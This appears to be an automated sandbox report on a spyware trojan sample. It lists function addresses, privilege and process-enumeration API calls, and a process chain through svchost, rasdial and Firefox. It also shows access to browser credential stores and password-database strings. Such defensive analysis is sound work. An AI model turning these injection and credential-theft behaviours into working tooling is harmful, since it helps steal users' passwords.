Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30100	3_2_03C30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDA118	3_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD2000	3_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3C7C0	3_2_03C3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C64750	3_2_03C64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40770	3_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5C6E0	3_2_03C5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D00591	3_2_03D00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40535	3_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEE4F6	3_2_03CEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF2446	3_2_03CF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE4420	3_2_03CE4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF6BD7	3_2_03CF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFAB40	3_2_03CFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D0A9A6	3_2_03D0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C56962	3_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E8F0	3_2_03C6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C268B8	3_2_03C268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4A840	3_2_03C4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C42840	3_2_03C42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C32FC8	3_2_03C32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4CFE0	3_2_03C4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBEFA0	3_2_03CBEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB4F40	3_2_03CB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C82F28	3_2_03C82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C60F30	3_2_03C60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE2F30	3_2_03CE2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFEEDB	3_2_03CFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C52E90	3_2_03C52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFCE93	3_2_03CFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40E59	3_2_03C40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFEE26	3_2_03CFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3ADE0	3_2_03C3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C58DBF	3_2_03C58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4AD00	3_2_03C4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDCD1F	3_2_03CDCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30CF2	3_2_03C30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE0CB5	3_2_03CE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40C00	3_2_03C40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C8739A	3_2_03C8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2D34C	3_2_03C2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF132D	3_2_03CF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5B2C0	3_2_03C5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE12ED	3_2_03CE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C452A0	3_2_03C452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C4B1B0	3_2_03C4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C7516C	3_2_03C7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2F172	3_2_03C2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D0B16B	3_2_03D0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEF0CC	3_2_03CEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C470C0	3_2_03C470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF70E9	3_2_03CF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFF0E0	3_2_03CFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFF7B0	3_2_03CFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF16CC	3_2_03CF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C85630	3_2_03C85630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDD5B0	3_2_03CDD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF7571	3_2_03CF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C31460	3_2_03C31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFF43F	3_2_03CFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB5BF0	3_2_03CB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C7DBF9	3_2_03C7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5FB80	3_2_03C5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFFB76	3_2_03CFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEDAC6	3_2_03CEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDDAAC	3_2_03CDDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C85AA0	3_2_03C85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE1AA3	3_2_03CE1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFFA49	3_2_03CFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF7A46	3_2_03CF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB3A6C	3_2_03CB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C49950	3_2_03C49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5B950	3_2_03C5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD5910	3_2_03CD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C438E0	3_2_03C438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAD800	3_2_03CAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C03FD2	3_2_03C03FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C03FD5	3_2_03C03FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C41F92	3_2_03C41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFFFB1	3_2_03CFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFFF09	3_2_03CFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C49EB0	3_2_03C49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5FDC0	3_2_03C5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C43D40	3_2_03C43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF1D5A	3_2_03CF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF7D73	3_2_03CF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFFCF2	3_2_03CFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB9C32	3_2_03CB9C32
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05210535	6_2_05210535
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052D0591	6_2_052D0591
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052C2446	6_2_052C2446
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052BE4F6	6_2_052BE4F6
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05210770	6_2_05210770
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05234750	6_2_05234750
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0520C7C0	6_2_0520C7C0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0522C6E0	6_2_0522C6E0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05200100	6_2_05200100
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052AA118	6_2_052AA118
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05298158	6_2_05298158
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052D01AA	6_2_052D01AA
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052C81CC	6_2_052C81CC
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052A2000	6_2_052A2000
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052CA352	6_2_052CA352
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052D03E6	6_2_052D03E6
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0521E3F0	6_2_0521E3F0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052B0274	6_2_052B0274
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052902C0	6_2_052902C0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0521AD00	6_2_0521AD00
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052ACD1F	6_2_052ACD1F
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05228DBF	6_2_05228DBF
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0520ADE0	6_2_0520ADE0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05210C00	6_2_05210C00
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052B0CB5	6_2_052B0CB5
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05200CF2	6_2_05200CF2
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05252F28	6_2_05252F28
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05230F30	6_2_05230F30
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052B2F30	6_2_052B2F30
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05284F40	6_2_05284F40
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0528EFA0	6_2_0528EFA0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0521CFE0	6_2_0521CFE0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05202FC8	6_2_05202FC8
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052CEE26	6_2_052CEE26
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05210E59	6_2_05210E59
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05222E90	6_2_05222E90
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052CCE93	6_2_052CCE93
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052CEEDB	6_2_052CEEDB
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05226962	6_2_05226962
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052129A0	6_2_052129A0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052DA9A6	6_2_052DA9A6
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0521A840	6_2_0521A840
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05212840	6_2_05212840
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_051F68B8	6_2_051F68B8
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0523E8F0	6_2_0523E8F0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052CAB40	6_2_052CAB40
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052C6BD7	6_2_052C6BD7
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0520EA80	6_2_0520EA80
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052C7571	6_2_052C7571
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052AD5B0	6_2_052AD5B0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052CF43F	6_2_052CF43F
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05201460	6_2_05201460
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052CF7B0	6_2_052CF7B0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052C16CC	6_2_052C16CC
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052DB16B	6_2_052DB16B
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0524516C	6_2_0524516C
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_051FF172	6_2_051FF172
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0521B1B0	6_2_0521B1B0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052C70E9	6_2_052C70E9
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052CF0E0	6_2_052CF0E0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052170C0	6_2_052170C0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052BF0CC	6_2_052BF0CC
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052C132D	6_2_052C132D
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_051FD34C	6_2_051FD34C
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0525739A	6_2_0525739A
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052152A0	6_2_052152A0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052B12ED	6_2_052B12ED
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0522B2C0	6_2_0522B2C0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052C7D73	6_2_052C7D73
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05213D40	6_2_05213D40
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052C1D5A	6_2_052C1D5A
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0522FDC0	6_2_0522FDC0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05289C32	6_2_05289C32
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052CFCF2	6_2_052CFCF2
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052CFF09	6_2_052CFF09
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052CFFB1	6_2_052CFFB1
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05211F92	6_2_05211F92
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05219EB0	6_2_05219EB0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052A5910	6_2_052A5910
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05219950	6_2_05219950
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0522B950	6_2_0522B950
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0527D800	6_2_0527D800
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052138E0	6_2_052138E0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052CFB76	6_2_052CFB76
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0522FB80	6_2_0522FB80
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05285BF0	6_2_05285BF0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0524DBF9	6_2_0524DBF9
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05283A6C	6_2_05283A6C
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052CFA49	6_2_052CFA49
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052C7A46	6_2_052C7A46
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_05255AA0	6_2_05255AA0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052ADAAC	6_2_052ADAAC
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052B1AA3	6_2_052B1AA3
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_052BDAC6	6_2_052BDAC6
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_03211FE0	6_2_03211FE0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0320B200	6_2_0320B200
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0320B1FB	6_2_0320B1FB
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0320B0B0	6_2_0320B0B0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0320D0C0	6_2_0320D0C0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_03215670	6_2_03215670
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0321386C	6_2_0321386C
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_03213870	6_2_03213870
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0322BE30	6_2_0322BE30
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0320CEA0	6_2_0320CEA0
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_0320CE99	6_2_0320CE99
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_04FBE78F	6_2_04FBE78F
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_04FBE2D6	6_2_04FBE2D6
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_04FBE3F3	6_2_04FBE3F3
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_04FBD858	6_2_04FBD858
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 6_2_04FBCAF8	6_2_04FBCAF8

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03C75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03C2B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03C87E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03CAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03CBF290 appears 105 times
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: String function: 0528F290 appears 105 times
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: String function: 05257E54 appears 102 times
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: String function: 051FB970 appears 272 times
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: String function: 0527EA12 appears 86 times
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: String function: 05245130 appears 58 times
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: String function: 006A9CB3 appears 31 times
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: String function: 006BF9F2 appears 40 times
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: String function: 006C0A30 appears 46 times

Source: cNDddMAF5u.exe, 00000001.00000003.1349440687.0000000003FE3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs cNDddMAF5u.exe
Source: cNDddMAF5u.exe, 00000001.00000003.1349050815.000000000418D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs cNDddMAF5u.exe

Source: cNDddMAF5u.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@7/4

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_007137B5 GetLastError,FormatMessageW,

1_2_007137B5

Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_007010BF AdjustTokenPrivileges,CloseHandle,		1_2_007010BF
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Code function: 1_2_007016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		1_2_007016C3

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_007151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

1_2_007151CD

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_0072A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

1_2_0072A67C

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_0071648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,

1_2_0071648E

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Code function: 1_2_006A42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

1_2_006A42A2

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

File created: C:\Users\user~1\AppData\Local\Temp\aut54A3.tmp

Jump to behavior

Source: cNDddMAF5u.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\cNDddMAF5u.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: rasdial.exe, 00000006.00000002.2583016993.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1892501630.00000000034A2000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1892371209.0000000003481000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2583016993.00000000034A2000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2583016993.00000000034D1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: cNDddMAF5u.exe	Virustotal: Detection: 65%
Source: cNDddMAF5u.exe	ReversingLabs: Detection: 81%

Source: unknown	Process created: C:\Users\user\Desktop\cNDddMAF5u.exe "C:\Users\user\Desktop\cNDddMAF5u.exe"
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\cNDddMAF5u.exe"
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
Source: C:\Windows\SysWOW64\rasdial.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\cNDddMAF5u.exe"	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\cNDddMAF5u.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe	Section loaded: dnsapi.dll	Jump to behavior
